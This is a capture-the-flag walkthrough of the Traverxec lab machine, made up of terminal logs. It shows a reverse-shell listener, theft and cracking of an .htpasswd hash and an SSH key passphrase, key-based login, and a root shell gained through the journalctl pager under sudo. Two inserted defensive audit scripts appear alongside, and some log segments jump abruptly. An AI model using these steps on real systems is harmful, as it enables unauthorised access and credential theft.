┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.165] 59770
bash: cannot set terminal process group (548): Inappropriate ioctl for device
bash: no job control in this shell
www-data@traverxec:/usr/bin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@traverxec:/usr/bin$
www-data@traverxec:/usr/bin$ cd /var/
cd /var/
www-data@traverxec:/var$ ls
ls
backups cache lib local lock log mail nostromo opt run spool tmp
www-data@traverxec:/var$ cd nostromo
cd nostromo
www-data@traverxec:/var/nostromo$ ls -la
ls -la
total 24
drwxr-xr-x 6 root root 4096 Oct 25 2019 .
drwxr-xr-x 12 root root 4096 Oct 25 2019 ..
drwxr-xr-x 2 root daemon 4096 Oct 27 2019 conf
drwxr-xr-x 6 root daemon 4096 Oct 25 2019 htdocs
drwxr-xr-x 2 root daemon 4096 Oct 25 2019 icons
drwxr-xr-x 2 www-data daemon 4096 Dec 9 06:44 logs
www-data@traverxec:/var/nostromo$ cd conf
cd conf
www-data@traverxec:/var/nostromo/conf$ ls -la
ls -la
total 20
drwxr-xr-x 2 root daemon 4096 Oct 27 2019 .
drwxr-xr-x 6 root root 4096 Oct 25 2019 ..
-rw-r--r-- 1 root bin 41 Oct 25 2019 .htpasswd
-rw-r--r-- 1 root bin 2928 Oct 25 2019 mimes
-rw-r--r-- 1 root bin 498 Oct 25 2019 nhttpd.conf
www-data@traverxec:/var/nostromo/conf$ cat .htpasswd
cat .htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
www-data@traverxec:/var/nostromo/conf$
┌──(kali㉿kali)-[~/桌面]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 ASIMD 4x2])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me (david)
1g 0:00:01:43 DONE (2023-12-09 20:10) 0.009675g/s 102352p/s 102352c/s 102352C/s Noyoudo..November^
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/桌面]
└─$ ssh david@10.10.10.165
The authenticity of host '10.10.10.165 (10.10.10.165)' can't be established.
ED25519 key fingerprint is SHA256:AbyOr506Yqq/VclZ900M6Ijj6qCoveykzcpc/cuIB14.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.165' (ED25519) to the list of known hosts.
david@10.10.10.165's password:
Permission denied, please try again.
david@10.10.10.165's password:
david@10.10.10.165: Permission denied (publickey,password).
homedirs /home
homedirs_public public_www
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/public_www
ls -la /home/david/public_www
total 16
drwxr-xr-x 3 david david 4096 Oct 25 2019 .
drwx--x--x 5 david david 4096 Oct 25 2019 ..
-rw-r--r-- 1 david david 402 Oct 25 2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25 2019 protected-file-area
www-data@traverxec:/var/nostromo/conf$ cd /home/david/public_www/protected-file-area
<conf$ cd /home/david/public_www/protected-file-area
www-data@traverxec:/home/david/public_www/protected-file-area$ ls
ls
backup-ssh-identity-files.tgz
www-data@traverxec:/home/david/public_www/protected-file-area$ ls -la
ls -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25 2019 .
drwxr-xr-x 3 david david 4096 Oct 25 2019 ..
-rw-r--r-- 1 david david 45 Oct 25 2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25 2019 backup-ssh-identity-files.tgz
www-data@traverxec:/home/david/public_www/protected-file-area$
┌──(kali㉿kali)-[~/桌面/home/david/.ssh]
└─$ ls -la
总计 20
drwx------ 2 kali kali 4096 2019年10月26日 .
drwxr-xr-x 3 kali kali 4096 12月 9日 20:39 ..
-rw-r--r-- 1 kali kali 397 2019年10月26日 authorized_keys
-rw------- 1 kali kali 1766 2019年10月26日 id_rsa
-rw-r--r-- 1 kali kali 397 2019年10月26日 id_rsa.pub
┌──(kali㉿kali)-[~/桌面/home/david/.ssh]
└─$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec
┌──(kali㉿kali)-[~/桌面/home/david/.ssh]
└─$ ls -la
总计 24
drwx------ 2 kali kali 4096 12月 9日 20:42 .
drwxr-xr-x 3 kali kali 4096 12月 9日 20:39 ..
-rw-r--r-- 1 kali kali 397 2019年10月26日 authorized_keys
-rw-r--r-- 1 kali kali 2458 12月 9日 20:42 hash-david.txt
-rw------- 1 kali kali 1766 2019年10月26日 id_rsa
-rw-r--r-- 1 kali kali 397 2019年10月26日 id_rsa.pub
┌──(kali㉿kali)-[~/桌面/home/david/.ssh]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash-david.txt
[sudo] kali 的密码:
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
1g 0:00:00:00 DONE (2023-12-09 20:43) 100.0g/s 14400p/s 14400c/s 14400C/s america..sandra
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
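Both secrets cracked above were cheap to guess offline: the .htpasswd entry uses md5crypt, and john reports the id_rsa passphrase as protected by MD5/AES with an iteration count of 1. The script below is an added example, not part of the original write-up; it classifies htpasswd hash schemes and private-key envelopes so such files can be found during an audit. The function names and every sample value are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: audit stored credentials for weak offline-guessing resistance.
# All sample values are constructed; none are taken from the target host.

# Map a crypt(3)/htpasswd hash string to "<scheme>:<verdict>".
hash_scheme() {
  case "$1" in
    '$1$'*)                  echo "md5crypt:weak" ;;
    '$apr1$'*)               echo "apr1-md5:weak" ;;
    '{SHA}'*)                echo "unsalted-sha1:weak" ;;
    '$2a$'*|'$2b$'*|'$2y$'*) echo "bcrypt:ok" ;;
    '$5$'*|'$6$'*)           echo "sha-crypt:ok" ;;
    '$y$'*)                  echo "yescrypt:ok" ;;
    *)                       echo "unknown:review" ;;
  esac
}

# Print "user scheme:verdict[ world-readable]" for each htpasswd entry.
audit_htpasswd() {
  local file="$1" user hash exposure=""
  [ -n "$(find "$file" -maxdepth 0 -perm -o=r)" ] && exposure=" world-readable"
  while IFS=: read -r user hash _ || [ -n "$user" ]; do
    [ -n "$user" ] && echo "$user $(hash_scheme "$hash")$exposure"
  done < "$file"
  return 0
}

# Classify a private key file by its PEM envelope. Legacy PEM encryption derives
# the cipher key from the passphrase with a single MD5 iteration.
key_protection() {
  case "$(head -n 1 "$1")" in
    "-----BEGIN OPENSSH PRIVATE KEY-----")
      echo "openssh-v1:inspect" ;;   # cipher and KDF are inside the base64 body
    "-----BEGIN RSA PRIVATE KEY-----"|"-----BEGIN DSA PRIVATE KEY-----"|"-----BEGIN EC PRIVATE KEY-----")
      grep -q '^Proc-Type: 4,ENCRYPTED' "$1" \
        && echo "legacy-pem-encrypted:weak" || echo "legacy-pem-plaintext:weak" ;;
    *) echo "other:review" ;;
  esac
}

# Run both checks on constructed files in a temp directory.
demo() {
  local d; d=$(mktemp -d)
  printf '%s\n' 'alice:$1$CONSTRUCT$notARealDigest' 'bob:$2y$10$constructedValue' > "$d/htpasswd"
  chmod 644 "$d/htpasswd"
  printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
    'DEK-Info: AES-128-CBC,00000000000000000000000000000000' > "$d/id_rsa"
  audit_htpasswd "$d/htpasswd"; key_protection "$d/id_rsa"; rm -rf "$d"
}
demo
```

A key reported as legacy-pem-encrypted can be rewritten in the OpenSSH format with a bcrypt KDF using `ssh-keygen -p -o -a <rounds> -f <keyfile>`.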
9. Next, the login succeeds and the first flag file is obtained
┌──(kali㉿kali)-[~/桌面/home/david/.ssh]
└─$ ssh david@10.10.10.165 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$
david@traverxec:~$ id
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
david@traverxec:~$ ls
bin public_www user.txt
david@traverxec:~$ cat user.txt
210c7881934afefed73f13a30a109522
david@traverxec:~$
0x02 Obtaining System Privileges
10. Trying sudo -l shows that a password is required
david@traverxec:~$ sudo -l
[sudo] password for david:
Sorry, try again.
[sudo] password for david:
Sorry, try again.
[sudo] password for david:
sudo: 3 incorrect password attempts
david@traverxec:~$
11. The current user's home directory contains an unusual bin directory
david@traverxec:~$ ls -la
total 36
drwx--x--x 5 david david 4096 Oct 25 2019 .
drwxr-xr-x 3 root root 4096 Oct 25 2019 ..
lrwxrwxrwx 1 root root 9 Oct 25 2019 .bash_history -> /dev/null
-rw-r--r-- 1 david david 220 Oct 25 2019 .bash_logout
-rw-r--r-- 1 david david 3526 Oct 25 2019 .bashrc
drwx------ 2 david david 4096 Oct 25 2019 bin
-rw-r--r-- 1 david david 807 Oct 25 2019 .profile
drwxr-xr-x 3 david david 4096 Oct 25 2019 public_www
drwx------ 2 david david 4096 Oct 25 2019 .ssh
-r--r----- 1 root david 33 Dec 9 06:44 user.txt
david@traverxec:~$ ls -la bin
total 16
drwx------ 2 david david 4096 Oct 25 2019 .
drwx--x--x 5 david david 4096 Oct 25 2019 ..
-r-------- 1 david david 802 Oct 25 2019 server-stats.head
-rwx------ 1 david david 363 Oct 25 2019 server-stats.sh
david@traverxec:~$
david@traverxec:~$ cd bin/
david@traverxec:~/bin$ ls
server-stats.head server-stats.sh
david@traverxec:~/bin$ cat server-stats.
cat: server-stats.: No such file or directory
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash
Last 5 journal log lines:
-- Logs begin at Sat 2023-12-09 06:43:59 EST, end at Sat 2023-12-09 07:55:03 EST. --
Dec 09 07:20:56 traverxec sudo[1047]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=www-data
Dec 09 07:20:59 traverxec sudo[1047]: pam_unix(sudo:auth): conversation failed
Dec 09 07:20:59 traverxec sudo[1047]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Dec 09 07:20:59 traverxec sudo[1047]: www-data : command not allowed ; TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=list
Dec 09 07:20:59 traverxec crontab[1108]: (www-data) LIST (www-data)
david@traverxec:~/bin$
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl
[sudo] password for david:
Sorry, try again.
[sudo] password for david:
Sorry, try again.
[sudo] password for david:
sudo: 3 incorrect password attempts
david@traverxec:~/bin$
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sat 2023-12-09 06:43:59 EST, end at Sat 2023-12-09 08:00:08
Dec 09 07:20:56 traverxec sudo[1047]: pam_unix(sudo:auth): authentication fai
Dec 09 07:20:59 traverxec sudo[1047]: pam_unix(sudo:auth): conversation faile
Dec 09 07:20:59 traverxec sudo[1047]: pam_unix(sudo:auth): auth could not ide
Dec 09 07:20:59 traverxec sudo[1047]: www-data : command not allowed ; TTY=pt
Dec 09 07:20:59 traverxec crontab[1108]: (www-data) LIST (www-data)
...skipping...
-- Logs begin at Sat 2023-12-09 06:43:59 EST, end at Sat 2023-12-09 08:00:08
Dec 09 07:20:56 traverxec sudo[1047]: pam_unix(sudo:auth): authentication fai
Dec 09 07:20:59 traverxec sudo[1047]: pam_unix(sudo:auth): conversation faile
Dec 09 07:20:59 traverxec sudo[1047]: pam_unix(sudo:auth): auth could not ide
Dec 09 07:20:59 traverxec sudo[1047]: www-data : command not allowed ; TTY=pt
Dec 09 07:20:59 traverxec crontab[1108]: (www-data) LIST (www-data)
~
~
~
~
~
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
1c4b05168db831689a52997559f73dc7
#
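The root shell above comes from the pager that journalctl starts when sudo runs it on a terminal. The script below is an added example, not part of the original write-up: it flags sudoers rules that run a pager-capable program as root without the NOEXEC tag or --no-pager. The sudoers lines are constructed (the page never shows the host's sudoers file; only the journalctl command line is taken from it), and the function names and program list are assumptions.

```shell
#!/usr/bin/env bash
# Added example: flag sudoers rules that run a pager-capable program as root
# without NOEXEC or --no-pager. Rule lines below are constructed.

# Programs that send output to an interactive pager when attached to a terminal.
PAGER_CAPABLE="journalctl systemctl less more man"

# Print one verdict per command in a sudoers user specification line.
audit_rule() {
  local spec="${1#*=}"                      # text after "host ="
  case "$1" in ''|'#'*|Defaults*) return 0 ;; esac
  printf '%s\n' "$spec" | tr ',' '\n' | {
    noexec=no                               # tags carry over to later commands
    while IFS= read -r cmd; do
      case "$cmd" in *NOEXEC:*) noexec=yes ;; *EXEC:*) noexec=no ;; esac
      case "$cmd" in */*) ;; *) continue ;; esac   # no path (e.g. "ALL"): skip
      path="/${cmd#*/}"; path=${path%% *}; prog=${path##*/}
      case " $PAGER_CAPABLE " in
        *" $prog "*) ;;
        *) echo "ok $path"; continue ;;
      esac
      if [ "$noexec" = yes ]; then
        echo "ok $path (NOEXEC)"
      elif [ "${cmd#*--no-pager}" != "$cmd" ]; then
        echo "ok $path (--no-pager)"
      else
        echo "risk $path (pager runs as root)"
      fi
    done
  }
}

# Audit every rule read from stdin.
audit_sudoers() { while IFS= read -r rule; do audit_rule "$rule"; done; }

# Assumed rule shapes: the weak form first, then two hardened variants.
audit_sudoers <<'EOF'
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
david ALL=(root) NOPASSWD: NOEXEC: /usr/bin/journalctl -n5 -unostromo.service
david ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
EOF
```

Because sudoers matches a rule's listed arguments exactly, putting --no-pager in the rule means the user cannot drop it at invocation time.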